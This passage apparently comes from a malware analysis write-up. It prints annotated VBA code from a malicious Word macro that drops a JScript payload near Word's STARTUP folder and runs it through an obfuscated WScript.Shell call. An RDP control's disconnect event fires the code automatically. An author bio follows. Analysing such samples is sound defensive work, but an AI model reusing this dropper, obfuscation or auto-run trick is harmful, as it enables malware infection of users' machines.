    r = r + 2
    c = c + 2
    ix = r * 20 + Int(c / 8) ' 20 bytes per row
    If ix > 5 Or ix < 0 Then GoTo Dro
    ' c = 2^(7 - (c MOD 8))
    c = 2 ^ (c Mod 8)
    va = parr(0, ix)
    If psiz > 0 Then
        If (Int(va / c) Mod 2) = 0 Then
            If pbit < 0 Then
                Mulent = True
                GoTo Dro
            End If
            parr(0, ix) = va + c
        Else
            GoTo Dro
        End If
    End If
    If pbit > 0 Then
        va = parr(1, ix)
        If (Int(va / c) Mod 2) = 0 Then va = va + c ' else va = va - c
        parr(1, ix) = va
    End If
Dro:
    ' Decodes to CreateObject("WScript.Shell").Run "<path>", 1 through late-bound
    ' CallByName (CallType 1 = VbMethod; (dc - dc) + 1 is an obfuscated 1).
    ' Assigning the result to TrackRevisions merely swallows the return value.
    Kirfool = """" + Kirfool + """"
    ActiveDocument.TrackRevisions = CallByName(CreateObject(Herdio("WaSacripata.Sahelala")), Herdio("Ruana"), (dc - dc) + 1, Kirfool, (dc - dc) + 1)
    Mulent = True
End Function

Private Function Molert(i As String) As String
    Molert = Replace(i, "y", "")
End Function

' Drops the payload. The document's body text (Me.Content.Text) is the JScript
' itself; it is written to <Word STARTUP folder>o\..\..\Dsaow.GaerIok., which
' resolves two directories above STARTUP, copied to Dsaow.GaerIok.jse, and the
' original file deleted.
Private Sub Branolp()
    Dim butilop As String
    Dim xShape As Shape, xBkgr As Shape
    Dim xAddr As String
    Dim xPosOldX As Double, xPosOldY As Double
    Dim xSizeOldW As Double, xSizeOldH As Double
    butilop = Me.Content.Text
    ' Herdio(Molert("yo\.aay.\a.y.\yya")) = "o\..\..\"; Molert("Dsaoyyyw.GayyyerIok.") = "Dsaow.GaerIok."
    Kirfool = Application.StartupPath & Herdio(Molert("yo\.aay.\a.y.\yya")) & Molert("Dsaoyyyw.GayyyerIok.")
    Dim Ikolpppp7 As Integer
    ' TypeName() returns "String", so the "to hui" checks below are always-true filler.
    If TypeName(Application.Caption) <> "to hui" Then
        Debug.Print "to hui"
    End If
    Ikolpppp7 = FreeFile
    Open Kirfool For Binary Lock Read Write As #Ikolpppp7
    If TypeName(Application.Caption) <> "to hui" Then
        Debug.Print "to hui"
    End If
    Put #Ikolpppp7, , butilop
    If TypeName(Application.Caption) <> "to hui" Then
        Debug.Print "to hui"
    End If
    Close #Ikolpppp7
    FileCopy Kirfool, Kirfool & Molert("yjysye")   ' Molert("yjysye") = "jse"
    If TypeName(Application.Caption) <> "to hui" Then
        Debug.Print "to hui"
    End If
    Kill Kirfool
    Kirfool = Kirfool & Molert("yjyysye")
    If TypeName(Application.Caption) <> "to hui" Then
        Debug.Print "to hui"
    End If
End Sub

' Entry point. The RDP control is given no server to connect to, so its
' disconnect event fires on its own shortly after the document is opened with
' macros enabled: drop the .jse, run it, then close the document.
Private Sub Moon_OnDisconnected(ByVal discReason As Long)
    RePac
    Branolp
    If (Mulent(Array(7, 8, 6), 0, 0, 0, 0, 0, discReason)) Then
        Me.Close
    End If
End Sub

Private Sub Document_ContentControlOnExit(ByVal ContentControl As ContentControl, Cancel As Boolean)
    Debug.Print "to hui"
End Sub


About the Author
Cyrus Robinson, CISSP, MCSE, MCITP, CEH, CHFI, Sec+
Mr. Robinson is a skilled Information Security professional with experience working with diversified technologies and environments. Mr. Robinson’s professional IT career began as an electronic forensics engineer as an active duty Airman with primary responsibilities with testing and evaluating digital forensic software, policies, and procedures. In this capacity, he worked alongside federal investigators and various DoD, CIA, FBI, NSA, and NIST employees. Following his active duty role with the USAF, Mr. Robinson went on to work in change management and system administration as a DoD Contractor. Mr. Robinson also has extensive experience in the roles of Information Security Officer and IT Director for a large medical group which contribute to his knowledge with security risk assessments, HIPAA compliance, and drafting and implementing corporate IT security and business continuity policies. Mr. Robinson holds various industry standard certifications and a Masters of Science in Information Security and Assurance.